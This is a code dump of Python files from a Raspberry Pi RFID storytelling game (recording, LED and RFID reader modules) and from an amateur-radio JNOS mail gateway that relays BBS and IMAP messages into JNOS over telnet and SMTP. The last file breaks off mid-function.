while True:
if rfidreaders.tags[i] is None or record_timer < time.time() or "ENDE" in rfidreaders.tags:
error_recording = audio.stop_recording(figure_id)
audio.play_full("TTS",57) #Aufnahme ist zu Ende"
new_recording = True
break
if new_recording:
if error_recording:
print("error while recording!")
audio.play_full("TTS",197) # Bei der Aufname ist ein Fehler passiert. Lass die Figur beim nächsten mal länger stehen
continue
#play audio after recording
audio.play_full("TTS",81) #Ich spiele dir jetzt die Aufnahme vor. Verwende zum Speichern den Ja-Spielstein. Zum Verwerfen den Nein-Spielstein
audio.play_story(figure_id)
#wait 60 seconds longer than recording otherwise continue to next figure - prevent program from freezing
waitingtime = time.time() + float(subprocess.run(['soxi','-D',figure_dir+'/'+figure_id+'.mp3'], stdout=subprocess.PIPE).stdout.decode('utf-8'))+60
while waitingtime > time.time():
#if rfidreaders.tags[i] == "JA":
if "JA" in rfidreaders.tags:
audio.kill_sounds()
audio.play_full("TTS",82) #Geschichte gespeichert
break
elif "NEIN" in rfidreaders.tags or "ENDE" in rfidreaders.tags:
#elif rfidreaders.tags[i] == "NEIN" or "ENDE" in rfidreaders.tags:
audio.kill_sounds()
files_in_dir = os.listdir(figure_dir)
sorted_files = sorted(files_in_dir)
#print(sorted_files)
if len(files_in_dir) <= 1:
#delete file
os.remove(figure_dir+"/"+figure_id+".mp3")
#delete folder
os.rmdir(figure_dir)
else:
#delete file
os.remove(figure_dir+"/"+figure_id+".mp3")
#rename second file in folder to figure_id without timestamp
os.rename(figure_dir+"/"+sorted_files[-1],figure_dir+"/"+figure_id+".mp3")
audio.play_full("TTS",83) #Geschichte nicht gespeichert
break
```
#### File: jimsio/hoorch/leds.py
```python
import threading
import RPi.GPIO as GPIO
import time
import random
#LEDS
GPIO.setmode(GPIO.BCM) #= GPIO pins (BCM)
GPIO.setwarnings(False)
led_pins = [23,18,17,12,7,8]#= GPIO pins (BCM)
led = []
led_value = [0,0,0,0,0,0]
#rotate_timer = None
random_timer = False
def init():
global led
for led_pin in led_pins:
GPIO.setup(led_pin,GPIO.OUT)
#l = GPIO.PWM(led_pin,100)
#l.start(100)
#led.append(l)
check_status()
randomer()
def reset():
global led_value
led_value = [0,0,0,0,0,0]
def check_status():
leds_timer = threading.Timer(0.05,check_status).start()
for i in range(0,6):
GPIO.output(led_pins[i], led_value[i])
#rotate through all leds one whole circle/round, time per led in seconds
def rotate_one_round(time_per_led):
global led_value
for i in range(0,6):
reset()
led_value[i] = 1
time.sleep(time_per_led)
reset()
def randomer():
global random_timer
threading.Timer(0.25,randomer).start()
if random_timer:
for index,i in enumerate(led_value):
led_value[index] = random.randint(0,1)
#not used
#TODO : implement as threaded timer - so it can be stopped
def rotate_timer(time_until_end, start_position):
time_per_led = time_until_end / 6
global led_value
led_value = [1,1,1,1,1,1]
for x in range(0,5):
position = start_position+x
if position > 5:
position -= 5
led_value[x] = 0
time.sleep(time_per_led)
#not used
#rotate leds
rotate_led = 0
def rotate():
global rotate_led
global rotate_timer
rotate_timer = threading.Timer(0.2,rotate).start()
for index,i in enumerate(led_value):
if index is rotate_led:
led_value[index] = 1
else:
led_value[index] = 0
rotate_led += 1
if rotate_led > 5:
rotate_led = 0
```
#### File: jimsio/hoorch/rfidreaders.py
```python
import board
import threading
import busio
from adafruit_pn532.spi import PN532_SPI
import digitalio
from digitalio import DigitalInOut
import RPi.GPIO as GPIO
import time
import os
import unicodedata
import audio
#gpio belegung
#Reader 1: Pin18 - GPIO24
#Reader 2: Pin15 - GPIO22
#Reader 3: Pin7 - GPIO4
#Reader 4: Pin37 - GPIO26
#Reader 5: Pin13 - GPIO27
#Reader 6: Pin40 - GPIO21
reader1_pin = DigitalInOut(board.D24)
reader2_pin = DigitalInOut(board.D22)
reader3_pin = DigitalInOut(board.D4)
reader4_pin = DigitalInOut(board.D26)
reader5_pin = DigitalInOut(board.D27)
reader6_pin = DigitalInOut(board.D21)
readers = []
tags = []
timer = [0,0,0,0,0,0]
figures_db = {} #figure database is a dictionary with tag id and tag name stored, based on predefined figure_db.txt. figure_db.txt is created when configuring HOORCH for the first time
gamer_figures = [] #ritter, koenigin,...
animal_figures = [] #Loewe2, Elefant1, ...
endofmessage = "#" #chr(35)
def init():
print("initialize the rfid readers and figure_db.txt")
spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
global readers
readers.append(PN532_SPI(spi, reader1_pin, debug=False))
readers.append(PN532_SPI(spi, reader2_pin, debug=False))
readers.append(PN532_SPI(spi, reader3_pin, debug=False))
readers.append(PN532_SPI(spi, reader4_pin, debug=False))
readers.append(PN532_SPI(spi, reader5_pin, debug=False))
readers.append(PN532_SPI(spi, reader6_pin, debug=False))
for n, reader in enumerate(readers):
#ic, ver, rev, support = reader.firmware_version
#print('Found Reader '+str(n)+' with firmware version: {0}.{1}'.format(ver, rev, support))
reader.SAM_configuration()
print('Initialized and configured RFID/NFC reader '+str(n+1))
tags.append(None)
#init figure db
path = "./figure_db.txt"
global gamer_figures
global animal_figures
if os.path.exists(path):
file = open(path, mode="r", encoding="utf-8")
figures_id_name = file.readlines()
file.close()
section = 0
for uid_name in figures_id_name:
#empty line means section change
if uid_name.startswith(";"):
section += 1
else:
(key, val) = uid_name.split(";")
figures_db[key] = val[:val.find("\n")]
if section == 2:
gamer_figures.append(uid_name[uid_name.find(";")+1:uid_name.find("\n")])
elif section == 3:
animal_figures.append(uid_name[uid_name.find(";")+1:uid_name.find("\n")-1])
continuous_read()
def continuous_read():
global readers
global tags
global gamer_figures
for index, r in enumerate(readers):
mifare = False
tag_uid = r.read_passive_target(timeout=0.2)
#safe energy - breaks reading of some readers
#r.power_down()
if tag_uid:
#convert byte_array tag_uid to string id_readable: 4-7-26-160
id_readable = ""
for counter, number in enumerate(tag_uid):
if counter < 4:
id_readable += str(number)+"-"
else:
id_readable = id_readable[:-1]
break
#reader has issues with reading mifare cards, stick with the tag_uid
if id_readable.endswith("-"):
#print("mifare chip!")#
id_readable = id_readable[:-1]
mifare = True
#check if tag id in figure db
try:
tag_name = figures_db[id_readable]
#id_readable is not in figures_db
except:
#reader has issues with reading mifare cards, stick with the tag_uid, dont read the tag content
if mifare:
tag_name = id_readable
else:
#read tag content to get the tag name
read_message = ""
breaker = False
try:
for i in range(7,14):
block = r.ntag2xx_read_block(i)
#print(block)
for character in block:
if character != ord(endofmessage):
read_message += chr(character)
else:
breaker = True
break
if breaker:
break
#if tag was removed before it was properly read
except TypeError:
print("Error while reading RFID-tag content. Tag was probably removed before reading was completed.")
audio.play_full("TTS",199) #Die Figur konnte nicht erkannt werden. Lass sie länger auf dem Feld stehen.
break
#remove unicode control characters from read string
read_message = "".join(ch for ch in read_message if unicodedata.category(ch)[0]!="C")
# enADMIN; - remove en at beginning
tag_name = read_message[2:]
#if a figure (i.e. Affe,1 or koenigin) from another game (i.e. as a replacement of a lost one) that is already defined in this game is used
#add another key value pair to the figures_db database
if tag_name in figures_db:
figures_db[id_readable] = tag_name
#elif tag_name.startswith("ADMIN"):
# tag_name = "ADMIN"
else:
#else set the unknown figure as a gamer figures, with the id_readable as tag_name
tag_name = id_readable
gamer_figures.append(tag_name)
print("added new unknown gamer figure to the temporary gamer_figure list")
else:
tag_name = None
# keep tags in array for 1 seconds to even out reading errors
if tag_name is None and timer[index] < time.time() :
tags[index] = tag_name #None
timer[index] = 0 #reset timer to 0
if tag_name is not None:
timer[index] = time.time()+1
tags[index] = tag_name
print(tags )
#rfidreaders_timer = threading.Timer(0.01,continuous_read).start()
rfidreaders_timer = threading.Timer(1.0,continuous_read).start()
``` |
{
"source": "jimsky7/JNOS-python",
"score": 2
} |
#### File: jimsky7/JNOS-python/mailInBBS.py
```python
print('========================================================')
import email, smtplib, telnetlib, logging, os, sys
from mailConfig import *
from telnetlib import Telnet
class ExitNow(Exception):
pass
# ====================================================================================
# General items
# If set, these will override mailConfig.py settings
# LIVE = FALSE
# DEBUG = TRUE
# TELNET_HOST = '192.168.2.2'
# jnosUser = 'aa6ax'
# sysDomain = 'AA6AX'
# localSMTP = '192.168.2.2'
# localSMTPSSL = FALSE
# function to check for JNOS disconnect in common input
def checkCommon(stchk, ctchk, cschk, logchk, bcs):
# Detect when returned to JNOS
if (stchk.find( "*** connected") >= 0):
print( "*** connected")
logchk.info(bcs+"*** connected")
return
if (stchk.find("*** failure with") >= 0):
sschk = "Remote BBS connection failed, so now ending the session with JNOS."
print(sschk)
logchk.critical(bcs+sschk)
if ((stchk.find("*** reconnected to") >= 0) or (stchk.find("*** failure with") >= 0)):
sschk = "Remote BBS connection failed unexpectedly, so now ending the session with JNOS."
print(sschk)
logchk.critical(bcs+sschk)
try:
ctchk.write(b'BYE' + TELNET_EOL)
print("BYE")
logchk.info(bcs+'BYE')
# Wait for *** Connection...
# From JNOS
ctchk.read_until(b'***')
except EOFError:
if (DEBUG):
print("Telnet was closed by JNOS.")
# End telnet JNOS session
ctchk.close()
# End SMTP JNOS session
if (cschk != None):
cschk.quit()
logchk.info(bcs+'All done.')
print('All done.')
print( '========================================================')
logchk.debug(bcs+'========================================================')
exit(0)
return
cs = None
def openSMTP(cso):
# ====================================================================================
# Connect to JNOS SMTP.
# This is where messages are delivered to the JNOS mailbox(es)
# SMTP already open?
if (cso != None):
return cso
# Open the SMTP connection now
try:
if (localSMTPSSL):
cso = smtplib.SMTP_SSL(localSMTP, 465, None, None, None, 30)
else:
cso = smtplib.SMTP(localSMTP, 25)
cso.helo(sysID)
except:
print('Unable to establish an SMTP connection to JNOS.')
print('Is JNOS running?')
log.critical(BCS+'Unable to establish an SMTP connection to JNOS!')
log.critical(BCS+'Is JNOS running?')
exit(0)
return cso
# Get these from ARGV[]
ls = len(sys.argv)
if (ls < 3):
print("USAGE: <interface> <bbsaddr> [<limit>]")
exit(0)
if (ls==3):
scriptName, BBS_INTERFACE, BBS_CONNECT = sys.argv
mnlimit = 1
if (ls==4):
scriptName, BBS_INTERFACE, BBS_CONNECT, mnlimit = sys.argv
mnlimit = int(mnlimit)
ss = "Connect to {} via {} interface to retrieve up to {} messages.".format(BBS_CONNECT, BBS_INTERFACE, mnlimit)
print(ss)
BBS_INTERFACE = BBS_INTERFACE.encode()
BBS_CONNECT = BBS_CONNECT.encode()
BBS_CALLSIGN_STR= BBS_CONNECT.split(b"-")
BBS_CALLSIGN_STR= BBS_CALLSIGN_STR[0].decode()
BBS_CALLSIGN = BBS_CALLSIGN_STR.encode()
BBS_TYPE = b''
BBS_TYPE_STR = BBS_TYPE.decode()
BCS = BBS_CALLSIGN_STR.upper() + " "
while len(BCS)<8:
BCS = BCS + " "
# ====================================================================================
# Set up logging
scriptPath, scriptName = os.path.split(__file__)
scriptName = scriptName.split('.')[0]
if (DEBUG):
logLevel = logging.DEBUG
else:
logLevel = logging.INFO
try:
logFormat = '%(asctime)-15s %(message)s'
logging.basicConfig(filename=(PATH_LOGS + scriptName + DOT_LOG), level=logLevel, format=logFormat)
log = logging.getLogger(scriptName)
log.info(BCS+'========================================================')
log.info(BCS+'========================================================')
log.info(BCS+'Begin processing inbound BBS messages.')
log.info(BCS+'Connecting to {} via {}'.format(BBS_CONNECT.decode(), BBS_INTERFACE.decode()))
ss = "Will transfer up to {} messages from {} via {}.".format(mnlimit, BBS_CONNECT.decode(), BBS_INTERFACE.decode())
log.info(BCS+ss)
print(ss)
if (DEBUG):
print("Logging to {}".format(PATH_LOGS + scriptName + DOT_LOG))
except:
print('Can\'t set up log file. Maybe permissions?')
# NOTE: Continue even if no log was set up.
if (LIVE == FALSE):
print('TESTING ONLY. No messages will be deleted from the remote BBS.')
log.warning(BCS+'TESTING ONLY. No messages will be deleted from the remote BBS.')
# ====================================================================================
# Connect to JNOS command line.
# This is how we'll fire up the radio to talk to the remote BBS
try:
ct = Telnet(TELNET_HOST)
ct.open(TELNET_HOST)
except:
print( 'Unable to connect to {}.'.format(TELNET_HOST))
log.warning(BCS+'Unable to connect to {}.'.format(TELNET_HOST))
print( 'Will not be able to talk to JNOS or the remote BBS.')
log.warning(BCS+'Will not be able to talk to JNOS or the remote BBS.')
else:
print( 'Connected (telnet) to JNOS at {}'.format(TELNET_HOST))
log.info(BCS+'Connected (telnet) to JNOS at {}'.format(TELNET_HOST))
# ====================================================================================
# Log in JNOS
# Note there is irregular capitalization "logon:" and "Password" so
# instead look for only the tail of those prompts.
print(ct.read_until(b'ogin: ', JNOS_WAIT).decode('ascii'))
ct.write(TELNET_USER.encode('ascii') + TELNET_EOL)
print(ct.read_until(b'assword: ', JNOS_WAIT).decode('ascii'))
ct.write(TELNET_PASS.encode('ascii') + TELNET_EOL)
print(ct.read_until(JNOS_PROMPT, JNOS_WAIT).decode('ascii'))
print( 'JNOS login completed.')
log.info(BCS+'JNOS login completed.')
# ====================================================================================
sb = b'connect ' + BBS_INTERFACE + b' ' + BBS_CONNECT
sbd = sb.decode()
print(sbd)
log.info(BCS + sbd)
ct.write(sb + TELNET_EOL)
# ====================================================================================
# INCOMING messages?
s = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
print(s)
checkCommon(s, ct, cs, log, BCS)
# BBS type?
pLines = s.strip("\r").split("\n")
for line in pLines:
if (line.startswith("[")):
BBS_TYPE = line.strip("\n")
BBS_TYPE = BBS_TYPE.strip("\r")
break
ss = "BBS type {}".format(BBS_TYPE)
print(ss)
log.info(BCS+ss)
BBS_TYPE_STR = str(BBS_TYPE)
ct.write(b'LM' + TELNET_EOL)
log.info(BCS+'LM')
s = (ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii'))
print(s)
checkCommon(s, ct, cs, log, BCS)
mnlist = []
mnkill = []
lmLines = s.strip("\r").split("\n")
print(lmLines)
sw = FALSE
for line in lmLines:
ls = line.split(" ")
st = str(ls[0]).strip("b'")
if (len(st) == 0 or st == '\r' or st.endswith(BBS_PROMPT_STR)):
sw = FALSE
if (sw):
print("Msg: {}".format(st))
try:
msgn = int(st)
mnlist.append(msgn)
except:
msgn = 0
stu = st.upper()
if (stu.startswith("MSG") or stu.startswith("MESS")):
sw = TRUE
sl = len(mnlist)
plural = 's'
if (sl==1):
plural = ''
ss = "{} message{}.".format(sl, plural)
print (ss)
log.info(BCS+ss)
if (sl):
print(mnlist)
log.info(BCS+str(mnlist))
mncount = 0
# READ all incoming messages
for msgn in mnlist:
# Pick up a limited number of messages each time
mncount = mncount + 1
if (mncount>mnlimit):
break
# Read next message
sb = b'READ ' + bytes(str(msgn), 'ascii') + b"\n"
print(sb.decode())
ct.write(sb)
if (BBS_TYPE_STR.startswith("[ARY")):
s = ct.read_until(BBS_PROMPT_ARY, BBS_WAIT).decode('ascii')
else:
s = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
# print(s)
checkCommon(s, ct, cs, log, BCS)
# ====================================================================================
lmLines = s.strip("\r").split("\n")
mailHeaders = {'To':'', 'From':'', 'Subject':'', 'Date':''}
# Switch based on portion of msg we are processing
# 'sw' = 0 before headers
# = 1 in headers
# = 2 in body
sw = 0
i = 0
body = ""
if (DEBUG):
print(lmLines)
log.debug(BCS+str(lmLines))
ss = "########## {}".format(BBS_TYPE_STR)
if (DEBUG):
print(ss)
log.info(BCS+ss)
while (sw < 3):
# Before header: Skip empty lines; skip ====== separators
if (len(lmLines)==0):
# Ran out of content in or before any body
sw = 2
break
hl = lmLines[0]
lh = len(hl)
if (sw==0):
if ((hl=='') or (hl=='\r') or ((lh>4) and hl.startswith("==========="))):
# Ignore before headers and do not transition
hl = lmLines.pop(0)
continue
else:
# Non-blanks line transitions to header processing
sw = 1
if (DEBUG):
print(">>> transition to headers")
# Process header lines
if (sw==1):
if ((lh>4) and hl.startswith("----------")):
# Ignore in headers
hl = lmLines.pop(0)
continue
if ((lh==0) or (hl=='') or (hl=='\r')):
# Empty line signals end of headers
hl = lmLines.pop(0)
sw = 2
if (DEBUG):
print(">>> end of headers")
continue
# Process header line
hl = lmLines.pop(0).strip(" ")
lh = len(hl)
if (DEBUG):
print("Analyzing header[{}]: {}".format(lh, hl))
# Parse KPC message ID string
if (BBS_TYPE_STR.startswith("[KPC") and (lh>4) and (hl.upper().startswith("MSG#"))):
if (DEBUG):
print(">>> KPC header")
# MSG number
msgParse = hl.split(" ")
msgNum = msgParse[0].split("#")
mn = msgNum[1]
# Date
msgParse1 = hl.split(" FROM ")
msgParse1 = msgParse1[0].split(" ")
# sDate = msgParse1[1] + " " + msgParse1[2]
# convert KPC date format DD/MM/YYYY HH:MM:SS to DD MMM YYYY, HH:MM:SS
dmy = msgParse1[1].split("/")
monthWord = {"01":"Jan", "02":"Feb", "03":"Mar", "04":"Apr", "05":"May", "06":"Jun", "07":"Jul", "08":"Aug", "09":"Sep", "10":"Oct", "11":"Nov", "12":"Dec"}
sDate = dmy[1]+" "+monthWord[dmy[0]]+" "+dmy[2]+" "+msgParse1[2]
mailHeaders['Date'] = sDate
# FROM
i = msgParse.index("FROM")
msgFrom = msgParse[i+1]
mailHeaders['From'] = "{}@{}".format(msgFrom, BBS_CALLSIGN_STR)
# TO
i = msgParse.index("TO")
msgTo = msgParse[i+1]
mailHeaders['To'] = msgTo
ss = ">>> completed parsing of KPC3+ MSG header, continuing"
if (DEBUG):
print(ss)
log.debug(BCS+ss)
continue
# All other BBS types (must) send headers
if (hl.find(":")):
hla = hl.split(":",1)
# a header
hla0u = hla[0].strip('\r').upper()
if (hla0u.startswith("DATE")):
# date
mailHeaders['Date'] = hla[1].strip(' \r')
if (hla0u.startswith("MESSAGE")):
# msg number
mailHeaders['Message-Id'] = hla[1].strip(' \r')
if (hla0u.startswith("FROM")):
# from
mailHeaders['From'] = hla[1].strip(' \r')
if (hla0u.startswith("TO")):
# to
mailHeaders['To'] = hla[1].strip(' \r')
if (hla0u.startswith("SUBJECT")):
# subject
mailHeaders['Subject'] = hla[1].strip(' \r')
if (sw==2):
if (DEBUG):
print(">>> checking to@/from@")
# Avoid looping when 'To" contains '@'
# Just chop off after the '@'
# ALL incoming messages must end here and not be forwarded
i = mailHeaders['To'].find("@")
if (i>0):
sp = mailHeaders['To'].split('@')
mailHeaders['To'] = str(sp[0])
# Add BBS callsign to the 'From'
i = mailHeaders['From'].find("@")
if (i<0):
mailHeaders['From'] = mailHeaders['From'] + "@" + BBS_CALLSIGN_STR
if (DEBUG):
print(mailHeaders)
log.debug(BCS+str(mailHeaders))
if (DEBUG):
print("Body analysis >>>>>>")
# Body
body = ""
while (sw == 2):
k = len(lmLines)
if (k==0):
sw = 3
if (DEBUG):
print(">>> end of body")
break
# One or more lines remain in body
bl = lmLines.pop(0)
lb = len(bl)
# If one line remains then it's the prompt
# so don't add to body
if ((k<3) and (bl.endswith("]>") or bl.endswith(BBS_PROMPT_R_STR))):
# (All of that is kind of ad hoc. Trying to differentiate
# betwen a BBS prompt ACTUAL and a BBS prompt embedded
# in a message.
# Sometimes ARY-BBS's end message with ]>\r and other
# time just with ]>
# So at the very end of incoming packet if the last line
# contains the BBS prompt, want to omit it.
sw = 3
if (DEBUG):
print(">>> body ended by prompt [{}] '{}'".format(k, bl))
else:
body = body + bl
# ensure no raw BBS prompt strings remain on incoming messages
# doesn't matter locally, but if user replies to one of these,
# this becomes safer for the ultimate recipient.
body = body.replace(BBS_PROMPT_STR, "> \r")
body = body.replace(BBS_PROMPT_N_STR, "> \n")
if (DEBUG):
print("Body below >>>>>>")
print(body)
log.debug(BCS+body)
print("Body above >>>>>>")
print( '--------------------------------------------------------')
log.debug(BCS+'--------------------------------------------------------')
moo = email.message.Message()
moo.set_type('text/plain')
for ih in mailHeaders.keys():
moo.__setitem__(ih, mailHeaders[ih])
# Add body to message. UTF-8 encoding is fine locally.
moo.set_payload(str(body).encode('utf-8'))
sentOK = TRUE
if LIVE:
print("Message {}: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(msgn, mailHeaders['From'], mailHeaders['To'], mailHeaders['Subject'], mailHeaders['Date']))
log.info(BCS+"Message {}:".format(i))
log.info(BCS+"From: {}".format(mailHeaders['From']))
log.info(BCS+"To: {}".format(mailHeaders['To']))
log.info(BCS+"Subject: {}".format(mailHeaders['Subject']))
log.info(BCS+"Date: {}".format(mailHeaders['Date']))
try:
cs = openSMTP(cs)
cs.send_message(moo)
sentOK = TRUE
except:
print("[SMTP] Exception when attempting to import into JNOS.")
log.warning(BCS+"[SMTP] Exception when attempting to import into JNOS.")
log.warning(BCS+"[SMTP] This message will be retried next time.")
sentOK = FALSE
else:
print("TEST ONLY: Message {} NOT imported: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(i, mailHeaders['From'], mailHeaders['To'], mailHeaders['Subject'], mailHeaders['Date']))
log.info(BCS+"Message {} NOT imported:".format(i))
log.info(BCS+"From: {}".format(mailHeaders['From']))
log.info(BCS+"To: {}".format(mailHeaders['To']))
log.info(BCS+"Subject: {}".format(mailHeaders['Subject']))
log.info(BCS+"Date: {}".format(mailHeaders['Date']))
sentOK = FALSE
if(sentOK):
if (LIVE):
ss = "KILL {}".format(msgn)
print(ss)
ct.write(ss.encode('ascii') + TELNET_EOL)
st = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
print(st)
checkCommon(st, ct, cs, log, BCS)
log.info(BCS+ss)
# List of deleted message numbers
mnkill.append(msgn)
else:
ss = "Message {} not deleted from remote BBS -- not LIVE".format(msgn)
print(ss)
log.warning(BCS+ss)
# ====================================================================================
# ====================================================================================
ct.write(b'BYE' + TELNET_EOL)
print("BYE")
log.info(BCS+'BYE')
# Wait for *** Connection...
# From JNOS
try:
ct.read_until(b'*** ')
except EOFError:
if (DEBUG):
print( "Telnet was closed by JNOS.")
log.debug(BCS+"Telnet was closed by JNOS.")
# End telnet JNOS session
ct.close()
if (cs != None):
cs.quit()
log.info(BCS+'All done.')
print( 'All done.')
print( '========================================================')
log.debug(BCS+'========================================================')
```
#### File: jimsky7/JNOS-python/mailIn.py
```python
print('========================================================')
import imaplib, email, smtplib, logging, os, base64, quopri
from mailConfig import *
class ExitNow(Exception):
pass
# ====================================================================================
# General items
# If set, these will override mailConfig.py settings
# LIVE = FALSE
# DEBUG = TRUE
# ====================================================================================
# Set up logging
scriptPath, scriptName = os.path.split(__file__)
scriptName = scriptName.split(".")[0]
if (DEBUG):
logLevel = logging.DEBUG
else:
logLevel = logging.INFO
try:
logFormat = "%(asctime)-15s %(message)s"
logging.basicConfig(filename=(PATH_LOGS + scriptName + DOT_LOG), level=logLevel, format=logFormat)
log = logging.getLogger(scriptName)
log.info("========================================================")
log.info("========================================================")
log.info("Begin processing inbound Internet email.")
if (DEBUG):
print("Logging to {}".format(PATH_LOGS + scriptName + DOT_LOG))
except:
print("Can't set up log file. Maybe permissions?")
# NOTE: Continue even if no log was set up.
if (LIVE == FALSE):
print( "TESTING ONLY. No messages will be sent or archived.")
log.info("TESTING ONLY. No messages will be sent or archived.")
cs = None
def openSMTP(cso):
# ====================================================================================
# Connect to JNOS SMTP.
# This is where messages are delivered to the JNOS mailbox(es)
# SMTP already open?
if (cso != None):
return cso
# Open the SMTP connection now
try:
if (localSMTPSSL):
cso = smtplib.SMTP_SSL(localSMTP, 465, None, None, None, 30)
else:
cso = smtplib.SMTP(localSMTP, 25)
cso.helo(sysID)
except:
print("Unable to establish an SMTP connection to JNOS.")
print("Is JNOS running?")
log.critical(BCS+"Unable to establish an SMTP connection to JNOS!")
log.critical(BCS+"Is JNOS running?")
exit(0)
return cso
# ====================================================================================
# Connect to the IMAP server (remote)
# This server is where messages from the Internet are received
try:
if (mxIMAPSSL):
cp = imaplib.IMAP4_SSL(mxIMAP)
else:
cp = imaplib.IMAP4(mxIMAP)
except:
print("Unable to establish an IMAP connection with {}.".format(mxIMAP))
print("Will not be able to pick up inbound mail.")
log.warning("Unable to establish an IMAP connection with {}.".format(mxIMAP))
log.warning("Will not be able to pick up inbound mail.")
else:
print( "Connected to IMAP server at {} for inbound mail.".format(mxIMAP))
log.info("Connected to IMAP server at {} for inbound mail.".format(mxIMAP))
# Authenticate for pick up of IMAP
try:
cp.login(user, pw)
except:
print( "IMAP login failed. Credentials may be incorrect.")
log.critical("IMAP login failed.")
exit(0)
namespace = cp.namespace()
log.debug(namespace[1][0])
# ====================================================================================
# Setup for inbound
# Select INBOX messages
# Will go thru and will relay these, then move
# each one to /JNOS-archive and
# mark as deleted in INBOX.
cp.select(inbox)
typ, mnb = cp.search(None, "ALL")
mns = str(mnb)
# mnnlist will be a list of message numbers to retrieve
mnlist = mns.strip("][b'").split(" ")
nm = len(mnlist)
# Number of messages waiting
# Check for empty
if mnlist[0]=="":
print( "No new mail.")
log.info("No new mail.")
nm = 0
mnlist = []
else:
print( "{} new messages available. {}".format(nm, mns))
log.info("{} new messages available. {}".format(nm, mns))
# List of messages to be deleted
mndeleted = []
# ====================================================================================
# Process all incoming messages
for i in mnlist:
# Extract headers from incoming message
mailHeaders = {"To":"", "From":"", "Subject":"", "Date":""}
if (DEBUG):
print( "--------------------------------------------------------")
log.debug("--------------------------------------------------------")
# DEBUG print start of message
# print(cp.retr(i+1)[1])
# Get the next message.
# There's no distinction on whether message is new or old.
# If it is in INBOX, it will be processed.
# After processing, it is copied to JNOS_archive and
# marked/flagged as deleted.
typ, msg_data = cp.fetch(str(i), "(RFC822)")
# Parse the incoming email
for response_part in msg_data:
if isinstance(response_part, tuple):
parsed_email = email.message_from_bytes(response_part[1])
if (DEBUG):
for header in [ "subject", "to", "from", "date" ]:
print("%-8s: %s" % (header.upper(), parsed_email[header]))
print("--------------------------------------------------------")
mp = parsed_email.is_multipart()
log.debug("Message {} incoming: {} Multipart?: {}".format(i, parsed_email.get_default_type(), mp))
body = ""
# Get body of this email
if mp:
log.debug("Multipart")
log.debug(parsed_email.get_boundary())
body = parsed_email.get_payload(0).as_string()
# WARNING: needs quoted-printable decoded
else:
log.debug("Not multipart")
body = parsed_email.get_payload()
# WARNING: needs quoted-printable decoded
# Decode base64 if present
# (Note unreliable way to detect base64 that will fail, for instance,
# if the message just includes the string.)
try:
x64,y64,z64 = body.rpartition("Content-Transfer-Encoding: base64")
if (y64!=""):
b = base64.b64decode(z64)
print( "Message was decoded from base64 to utf-8")
log.debug("Message was decoded from base64 to utf-8")
body = b.decode("utf-8")
except:
traceback.print_tb(sys.exc_info()[2])
print( "Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.critical("Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
# Decode quoted-printable if present
# (Note unreliable way to detect quoted-printable)
try:
if (body.find("=\r") or body.find("=20\r")):
b = quopri.decodestring(bytes(body, "utf-8"))
print( "Message was decoded from quoted-printable to utf-8")
log.debug("Message was decoded from quoted-printable to utf-8")
body = b.decode("utf-8")
except:
traceback.print_tb(sys.exc_info()[2])
print( "Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.critical("Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.debug("--------------------------------------------------------")
# Keep (transfer) certain headers to msg we're building
for headerKey in headersToKeep:
if headerKey in parsed_email.keys():
mailHeaders[headerKey] = parsed_email[headerKey]
# Transform the 'To:' header if an account is present
to = mailHeaders["To"]
# Strip quotes and blanks leading and trailing on the 'to' header
# Don't know exactly which, but some mailers allow them.
to = to.strip("\"' ")
log.debug("Analyzing To: {}".format(to))
# May be of the form "area@BBS" <email>
# Check any quoted part, as this may be the area/mailbox plus BBS name
s = to.split("\"")
if ((len(s)>1) and len(s[1])):
# area@BBS was explicitly set
if (jnosUser.count(".")):
# Internet forwarding has '.' in the address
mailHeaders["To"] = "\"{}\" <{}>".format(s[1].strip("\""), jnosUser.strip(" ><"))
else:
# BBS forwarding
mailHeaders["To"] = s[1].strip("\"")
else:
# area@BBS not set, use default
if (jnosUser.count(".")):
# Internet forwarding has '.' in the address
mailHeaders["To"] = "<{}>".format(jnosUser.strip(" ><"))
else:
# BBS forwarding
mailHeaders["To"] = "<{}>".format(jnosUser.strip(" ><"))
# print the final headers
for hk in mailHeaders:
log.debug(hk+": " + mailHeaders[hk])
log.debug('--------------------------------------------------------')
sw = 0
# Connect to SMTP and inject the message
#
moo = email.message.Message()
moo.set_type("text/plain")
for ih in mailHeaders.keys():
moo.__setitem__(ih, mailHeaders[ih])
moo.set_payload(str(body).encode("utf-8"))
sentOK = TRUE
if LIVE:
print( "Message {} relayed: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(i, mailHeaders["From"], mailHeaders["To"], mailHeaders["Subject"], mailHeaders["Date"]))
log.info("Message {} relayed:".format(i))
log.info("From: {}".format(mailHeaders["From"]))
log.info("To: {}".format(mailHeaders["To"]))
log.info("Subject: {}".format(mailHeaders["Subject"]))
log.info("Date: {}".format(mailHeaders["Date"]))
try:
cs = openSMTP(cs)
cs.send_message(moo)
sentOK = TRUE
except:
print( "[SMTP] Exception when attempting to send this message.")
log.warning("[SMTP] Exception when attempting to send this message.")
log.warning("[SMTP] This message will be retried.")
sentOK = FALSE
else:
print( "TEST ONLY: Message {} NOT relayed: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(i, mailHeaders["From"], mailHeaders["To"], mailHeaders["Subject"], mailHeaders["Date"]))
log.info("Message {} NOT relayed:".format(i))
log.info("From: {}".format(mailHeaders["From"]))
log.info("To: {}".format(mailHeaders["To"]))
log.info("Subject: {}".format(mailHeaders["Subject"]))
log.info("Date: {}".format(mailHeaders["Date"]))
# Copy this message to the archive
log.debug("--------------------------------------------------------")
try:
# Try to create new archive (mailbox)
if (LIVE):
typ, cr = cp.create(archive)
except:
log.debug( "Message will be archived in {}.".format(archive))
else:
if (LIVE):
log.debug("Message will be archived in {}.".format(archive))
try:
if LIVE:
cp.copy(str(i), archive)
except Exception as ex:
